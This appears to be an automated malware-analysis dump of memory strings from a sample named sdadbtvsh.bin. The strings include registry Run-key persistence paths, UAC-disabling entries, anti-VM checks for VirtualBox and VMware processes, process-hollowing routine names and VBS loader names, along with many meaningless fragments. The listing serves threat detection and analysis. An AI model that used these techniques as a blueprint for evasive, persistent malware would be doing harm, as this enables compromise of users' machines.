Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eh#o memstr_20e766f4-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @ax$o memstr_0fbbbf1d-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exec//_i memstr_3b8edabb-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h.$_b memstr_d5a05f94-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6(x#o memstr_39822b86-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3!m_+ memstr_fc8eb4e0-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \*.*x#o memstr_a6faf1f3-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_ct memstr_f4dbe14e-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m.9xg memstr_248af7d0-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 646xp memstr_2f46ac43-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 25xs memstr_5fcd210c-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: e($o memstr_ac25c2cc-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @#lx* memstr_48738718-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \*.*qx? memstr_a6eea226-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szo memstr_07d9be22-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz memstr_2dbd3589-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auex*yt memstr_b09a04f9-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbldr memstr_5dbaa3ab-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6zoy) memstr_be270eca-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3udy" memstr_366993c8-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6npy> memstr_02afe547-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gtjy4 memstr_923897fd-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dir3ctory_path memstr_0210a800-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: program manager memstr_403109b7-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: comspec memstr_1b9da727-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: read_uac memstr_09092b70-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxservice.exe&zo memstr_d68d4b90-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run memstr_3a315f3f-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\runhz memstr_071cd9ea-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runwz0 memstr_0a40273a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdirrz memstr_6e6f90be-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbsloaderset memstr_2c1a5e53-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: key_vbsloader memstr_fc9fc995-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmcessexists0[} memstr_fdd64b68-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auexin memstr_a1f3b784-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbox.exeistsz[# memstr_6cb5726e-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\runa[ memstr_4def25f1-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: taskname memstr_a6c5a93c-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: meomrypersistance memstr_b39088a7-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_current_user\software\microsoft\windows\currentversion\run memstr_1f202d76-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: disableuac memstr_882897c1-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbsloaderset't` memstr_00cbb45f-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefree memstr_df89d330-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: d:\espacefreeit memstr_a7b4af61-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptdirtt1 memstr_8c641f57-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runst memstr_a9254601-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hklm64\software\microsoft\windows\currentversion\policies\system memstr_b846eb1c-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_sandbox_vm memstr_8b4a7425-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vboxtray.exe memstr_61fe1ce7-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: script memstr_38de9fc1-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: anti_botkill*us memstr_22580a70-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupkey1u~ memstr_d3c41a2f-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup1 memstr_0030079e-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shortx memstr_5a2ef1c9-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_c?w memstr_8d957dfa-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @eewo memstr_fba3a10c-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /trxwb memstr_bc1d0dc6-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 0skhcmrwx memstr_ca687d2d-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: "tw^ memstr_df616826-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: le6xt memstr_47f41377-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auex memstr_6b1ab3a2-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ware' memstr_c815319e-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: sw_hide memstr_eb1acfe9-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auexsp memstr_91e64536-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: execup memstr_991ea283-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szdpn memstr_dc766901-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @$wp] memstr_536cbe91-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: da3m. memstr_7eb8d369-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6y@qj memstr_8a10d363-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gxsqy memstr_028c3de2-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szt memstr_77b06294-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_sz2r memstr_3d96ecca-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: le6qt memstr_65140e00-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6~ero memstr_f5b81a22-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ni_set memstr_67451a9b-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkey_local_machine\software\microsoft\windows\currentversion\run9s memstr_011407a7-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\wrse\nngqrvwq.xl memstr_2617ed09-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .\device\harddiskvolume3us memstr_d8e58357-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .\device\harddiskvolume3 memstr_a1a5668e-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .\device\harddiskvolume37 memstr_9263815f-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .\device\harddiskvolume3 memstr_7922f5b3-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .\device\harddiskvolume3| memstr_9288a04d-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enableluatware\microso memstr_f02350a7-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_dword memstr_2dde727e-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe/ memstr_74b289a0-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_pathchine\soft& memstr_7a072fee-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folder9 memstr_2486c7aa-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ini_settings0 memstr_07ec74cd-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup2 memstr_0b9e660e-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: settingsfn memstr_7b72133b-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupkey memstr_d5b7d2f4-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_foldere /sc mi memstr_a359fa7d-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: update.vbsn memstr_93feacee-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_patha memstr_36881846-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: settingsfnx memstr_7d66eb9e-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folders memstr_91d2641c-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dir3ctory_pathej memstr_e44b06b7-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vmwareservice.exem memstr_a7490cac-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folderd memstr_5f7bbed3-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: update.vbs_ memstr_abeff0a7-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ini_settingsv memstr_c8452f69-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dir3ctory_pathe memstr_4065536c-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.vbs memstr_dbeb4a65-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ini_settings memstr_e181be5f-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: windowsrepaire memstr_3af8a476-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enablelua memstr_b30dc0a8-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start.lnk memstr_1f0244ed-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startupkeyware\microso memstr_7149cfa1-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_path memstr_202f3d4b-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: const hidden = 0 memstr_4cbd44f1-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_folder memstr_c1b7a60c-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qsprs memstr_706951ab-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @(rt memstr_17d95afa-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tam*.b memstr_0045b4eb-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @x(rt memstr_e3c9094a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hmhqt memstr_91b6f8df-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: crlfl memstr_084bb939-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: counter memstr_d9895a5d-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: start memstr_a4c5ec90-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: crlfhpt memstr_25846bfc-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ray.exej memstr_7a1a2c2e-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3bhlt memstr_080fbb02-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: eymxo$ memstr_e30697c8-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @6b8mt memstr_dace0ed2-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: h[8lt memstr_cb640584-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: mkhlt memstr_4a2950d1-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: msxlt memstr_5c206dab-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: script[ memstr_ca6bf852-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @x8mt memstr_fc039222-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gxmt memstr_dc44330a-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: short memstr_608465e7-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptj memstr_87c36bb2-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6_hot memstr_6045b811-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: reg_szx memstr_f3804915-d
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @ehrt memstr_5d86d45f-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 8ehmt memstr_a07fc1dd-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enm l memstr_522d35cd-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ho(st memstr_bbd16feb-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: scriptl memstr_429507d6-3
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: file =" memstr_69d6a379-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,hd8ot memstr_e29c4028-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,2j8ot memstr_424ba123-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m'hnt memstr_6a4f68f0-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3)xot memstr_cfaba98e-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: m?xot memstr_b12f2ca1-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: crlfhnt memstr_a8c0c16a-c
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: '6xhot memstr_aa82f0d3-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,88ot memstr_5733a420-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: '8hot memstr_73896cbc-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shortxpt memstr_a94e495b-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: enm8e memstr_70796865-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 6:8pt memstr_e89ae687-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: auexhn memstr_fc3946c3-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 3$8qt memstr_d32a4f9d-a
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: exe_c memstr_4b2d79ac-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: batwrite) memstr_3a0757cd-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbsclose8 memstr_3f160631-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\windows\currentversion\runoncew memstr_01a2dc6d-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: vbswritef memstr_ea4d0f31-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: batclose memstr_04b59799-0
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup memstr_51768f26-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_path; memstr_4b5821e7-2
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_pathrtcut memstr_04772d44-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hkcu64\software\microsoft\wi memstr_98db566c-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: startup2version\runonc memstr_d720381c-8
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: install_pathv memstr_15822562-e
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: antitaskp memstr_9f303e67-4
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pqgiogoraarleguqldnvhv.exe- memstr_bc04aeee-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_iswow64process: memstr_93d69d38-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_unmapviewofsection3 memstr_d2a6bd24-7
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_allocateexespace memstr_75a408f7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tbinary_iswow64processk memstr_f36408f0-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: zpsers\user\temp\wgsr.msc@ memstr_1a739850-9
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\windows\system32\msctf.dllv memstr_d44156c7-b
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _runbinary_iswow64procession memstr_7e1a3a86-5
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: orleql memstr_0019bda9-f
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p~kpp memstr_fe80db5c-1
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: psers\user\temp\wgsr.msc memstr_1c4f5615-6
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pqgiogoraarleguqldnvhv.exe memstr_aa1320be-1
